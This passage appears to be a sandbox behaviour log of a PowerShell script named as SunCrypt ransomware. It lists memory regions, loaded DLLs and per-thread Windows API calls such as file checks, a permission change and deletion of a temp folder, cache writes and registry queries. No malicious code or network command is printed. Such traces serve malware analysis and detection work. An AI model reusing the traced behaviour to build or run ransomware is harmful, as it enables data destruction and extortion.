monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1537 start_va = 0x7ffd4000 end_va = 0x7ffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1538 start_va = 0x7ffd5000 end_va = 0x7ffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1539 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1540 start_va = 0x74a00000 end_va = 0x74a07fff monitored = 0 entry_point = 0x74a01356 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 1541 start_va = 0x757d0000 end_va = 0x757f8fff monitored = 0 entry_point = 0x757d6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1542 start_va = 0x709e0000 end_va = 0x709f3fff monitored = 0 entry_point = 0x709e15c9 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 1543 start_va = 0x709c0000 end_va = 0x709d6fff monitored = 0 entry_point = 0x709c1549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 1544 start_va = 0x749f0000 end_va = 0x749f7fff monitored = 0 entry_point = 0x749f3c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 1545 start_va = 0x73fb0000 end_va = 0x73fbefff monitored = 0 entry_point = 0x73fb12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" 
(normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1546 start_va = 0x73fc0000 end_va = 0x73fc8fff monitored = 0 entry_point = 0x73fc15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1547 start_va = 0x6aba0000 end_va = 0x6abacfff monitored = 0 entry_point = 0x6aba12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1548 start_va = 0x73e0000 end_va = 0x75dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073e0000" filename = "" Region: id = 1549 start_va = 0x75e0000 end_va = 0x79dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075e0000" filename = "" Region: id = 1552 start_va = 0xb60000 end_va = 0xb61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 1553 start_va = 0xb70000 end_va = 0xb77fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1554 start_va = 0xb80000 end_va = 0xb83fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1555 start_va = 0xb90000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1556 start_va = 0x75150000 end_va = 0x75193fff monitored = 0 entry_point = 0x751663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1557 start_va = 0x7090000 end_va = 0x70dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007090000" filename = "" Region: id = 1558 start_va = 0x727d0000 end_va = 0x727ebfff monitored = 0 entry_point = 0x727da431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1559 start_va = 0x727c0000 end_va = 0x727c6fff monitored = 0 entry_point = 0x727c128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1560 start_va = 0x70310000 end_va = 0x70361fff monitored = 0 entry_point = 0x703114be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1561 start_va = 0x702f0000 end_va = 0x70304fff monitored = 0 entry_point = 0x702f12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1562 start_va = 0x73a50000 end_va = 0x73a5cfff monitored = 0 entry_point = 0x73a51326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1563 start_va = 0x1a70000 end_va = 0x1a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 1564 start_va = 0x7180000 end_va = 0x71bffff monitored = 1 entry_point = 0x0 region_type = private name = 
"private_0x0000000007180000" filename = "" Region: id = 1565 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1566 start_va = 0x1a70000 end_va = 0x1a70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a70000" filename = "" Region: id = 1567 start_va = 0x6bcb0000 end_va = 0x6bcb5fff monitored = 0 entry_point = 0x6bcb125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 1568 start_va = 0x73c80000 end_va = 0x73c8ffff monitored = 0 entry_point = 0x73c838c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1569 start_va = 0x3d10000 end_va = 0x3d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 1570 start_va = 0x72b0000 end_va = 0x736ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072b0000" filename = "" Region: id = 1571 start_va = 0x79e0000 end_va = 0x7bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079e0000" filename = "" Region: id = 1572 start_va = 0x73550000 end_va = 0x73555fff monitored = 0 entry_point = 0x735514b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1573 start_va = 0x75290000 end_va = 0x752cbfff monitored = 0 entry_point = 0x7529145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1574 start_va = 0x79e0000 end_va = 0x7acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079e0000" filename = "" 
Region: id = 1575 start_va = 0x6fb40000 end_va = 0x6fb45fff monitored = 0 entry_point = 0x6fb42311 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1576 start_va = 0x74de0000 end_va = 0x74de4fff monitored = 0 entry_point = 0x74de15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1577 start_va = 0x75280000 end_va = 0x75285fff monitored = 0 entry_point = 0x75281673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1578 start_va = 0x72c0000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072c0000" filename = "" Region: id = 1579 start_va = 0x7360000 end_va = 0x736ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007360000" filename = "" Region: id = 1580 start_va = 0x7ffa6000 end_va = 0x7ffa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Thread: id = 1 os_tid = 0xfb0 Thread: id = 2 os_tid = 0xfcc Thread: id = 3 os_tid = 0xfd0 Thread: id = 4 os_tid = 0xfd4 Thread: id = 5 os_tid = 0xfd8 Thread: id = 6 os_tid = 0xfdc [0081.179] RegCloseKey (hKey=0x468) returned 0x0 [0083.147] CloseHandle (hObject=0x4bc) returned 1 [0090.645] CloseHandle (hObject=0x500) returned 1 [0099.046] LocalFree (hMem=0x315c98) returned 0x0 [0100.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", nBufferLength=0x104, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", lpFilePart=0x0) returned 0x2f [0100.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1a5f678) returned 1 [0100.067] GetFileAttributesExW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj"), fInfoLevelId=0x0, lpFileInformation=0x1a5f93c | out: lpFileInformation=0x1a5f93c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0100.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1a5f674) returned 1 [0100.068] ConvertStringSecurityDescriptorToSecurityDescriptorW (in: StringSecurityDescriptor="D:(A;OICI;FA;;;S-1-5-21-3683305739-1236715609-858405165-1000)(A;OICI;FA;;;BA)", StringSDRevision=0x1, SecurityDescriptor=0x1a5f950, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x1a5f950*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8004, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Sacl=0x0*(AclRevision=0x0, Sbz1=0x0, AclSize=0x0, AceCount=0x14, Sbz2=0x0), Dacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x44)), SecurityDescriptorSize=0x0) returned 1 [0100.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", cchWideChar=47, lpMultiByteStr=0x1a5f8d0, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkji\x0e\x88Ãg…â©üDþIièû¥\x01\x10\x9d+", lpUsedDefaultChar=0x0) returned 47 [0100.070] SetNamedSecurityInfoA () returned 0x0 [0100.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1a5f938) returned 1 [0100.073] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x30 [0100.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", nBufferLength=0x30, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", lpFilePart=0x0) returned 0x2f [0100.073] FindFirstFileW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\*", lpFindFileData=0x1a5f6e8 | out: lpFindFileData=0x1a5f6e8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d900 [0100.073] FindNextFileW (in: hFindFile=0x34d900, lpFindFileData=0x1a5f6f0 | out: lpFindFileData=0x1a5f6f0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.073] FindNextFileW (in: hFindFile=0x34d900, lpFindFileData=0x1a5f6f0 | out: lpFindFileData=0x1a5f6f0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) 
returned 0 [0100.073] FindClose (in: hFindFile=0x34d900 | out: hFindFile=0x34d900) returned 1 [0100.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1a5f6a8) returned 1 [0100.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1a5f908) returned 1 [0100.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x30 [0100.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", nBufferLength=0x30, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj", lpFilePart=0x0) returned 0x2f [0100.074] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1a5f430) returned 1 [0100.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj"), fInfoLevelId=0x0, lpFileInformation=0x1a5f6f8 | out: lpFileInformation=0x1a5f6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0100.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1a5f42c) returned 1 [0100.075] FindFirstFileW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj\\*", lpFindFileData=0x1a5f71c | out: lpFindFileData=0x1a5f71c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) 
returned 0x34d900 [0100.075] FindNextFileW (in: hFindFile=0x34d900, lpFindFileData=0x1a5f71c | out: lpFindFileData=0x1a5f71c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.075] FindNextFileW (in: hFindFile=0x34d900, lpFindFileData=0x1a5f71c | out: lpFindFileData=0x1a5f71c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8550e60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xab47a240, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab47a240, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0100.075] FindClose (in: hFindFile=0x34d900 | out: hFindFile=0x34d900) returned 1 [0100.075] RemoveDirectoryW (lpPathName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bx213pkj" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\bx213pkj")) returned 1 [0100.080] CloseHandle (hObject=0x4f4) returned 1 [0100.080] CloseHandle (hObject=0x4fc) returned 1 [0100.080] CloseHandle (hObject=0x4f8) returned 1 [0100.080] CloseHandle (hObject=0x4f0) returned 1 [0100.080] CloseHandle (hObject=0x468) returned 1 [0100.080] CloseHandle (hObject=0x508) returned 1 [0100.080] CloseHandle (hObject=0x4d4) returned 1 [0100.081] CloseHandle (hObject=0x4d0) returned 1 [0100.081] CloseHandle (hObject=0x4cc) returned 1 [0100.081] CloseHandle (hObject=0x4c8) returned 1 [0100.081] CloseHandle (hObject=0x4c4) returned 1 [0100.647] LocalFree (hMem=0x4274c30) returned 0x0 Thread: id = 7 os_tid = 0xfe0 [0128.235] CoUninitialize () Thread: id = 8 os_tid = 0xfe4 Thread: id = 9 
os_tid = 0xfe8 Thread: id = 10 os_tid = 0xfec Thread: id = 11 os_tid = 0xff0 [0127.951] CoUninitialize () Thread: id = 12 os_tid = 0xffc Thread: id = 13 os_tid = 0x378 Thread: id = 14 os_tid = 0x818 Thread: id = 15 os_tid = 0x4bc [0102.619] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0xffffffff [0102.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell", nBufferLength=0x104, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell", lpFilePart=0x0) returned 0x3e [0102.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x418ea88) returned 1 [0102.620] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell"), fInfoLevelId=0x0, lpFileInformation=0x418ed4c | out: lpFileInformation=0x418ed4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcfa29360, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xcfa29360, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xcfa29360, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0102.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x418ea84) returned 1 [0102.620] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0102.620] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x53, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x52 [0102.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x418ecac) returned 1 [0102.620] CreateFileW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x508 [0102.621] GetFileType (hFile=0x508) returned 0x1 [0102.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x418eca8) returned 1 [0102.621] GetFileType (hFile=0x508) returned 0x1 [0102.886] WriteFile (in: hFile=0x508, lpBuffer=0x6287eb4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x418ed30, lpOverlapped=0x0 | out: lpBuffer=0x6287eb4*, lpNumberOfBytesWritten=0x418ed30*=0x1000, lpOverlapped=0x0) returned 1 [0102.888] WriteFile (in: hFile=0x508, lpBuffer=0x6287eb4*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x418ed1c, lpOverlapped=0x0 | out: lpBuffer=0x6287eb4*, lpNumberOfBytesWritten=0x418ed1c*=0x286, lpOverlapped=0x0) returned 1 [0102.888] CloseHandle (hObject=0x508) returned 1 [0102.889] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0102.889] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", nBufferLength=0x53, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache", lpFilePart=0x0) returned 0x52 [0102.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x418eac0) returned 1 [0102.890] GetFileAttributesExW 
(in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache"), fInfoLevelId=0x0, lpFileInformation=0x62ad0f0 | out: lpFileInformation=0x62ad0f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xae4fa280, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xae4fa280, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xae7819e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x1286)) returned 1 [0102.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x418eabc) returned 1 [0128.240] CoUninitialize () Thread: id = 16 os_tid = 0x4b8 [0081.029] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.040] EtwEventRegister () returned 0x0 [0081.041] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebf194, nSize=0x80 | out: lpBuffer="") returned 0x0 [0081.047] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1")) returned 0x20 [0081.048] LocalReAlloc (hMem=0x340c10, uBytes=0x208, uFlags=0x2) returned 0x4265bc8 [0081.048] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x104, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebef58) returned 1 [0081.048] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebf21c | out: lpFileInformation=0x4ebf21c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0081.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebef54) returned 1 [0081.050] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1")) returned 0x20 [0081.050] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0081.050] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0081.050] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebf0e8, Length=0x20, ResultLength=0x4ebf158 | out: SystemInformation=0x4ebf0e8, ResultLength=0x4ebf158*=0x0) returned 0xc0000003 [0081.050] GetSystemInfo (in: lpSystemInfo=0x4ebf164 | out: lpSystemInfo=0x4ebf164*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0081.051] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf0f4 | out: phkResult=0x4ebf0f4*=0x4b8) returned 0x0 [0081.051] RegQueryValueExW (in: hKey=0x4b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebf110, lpData=0x0, 
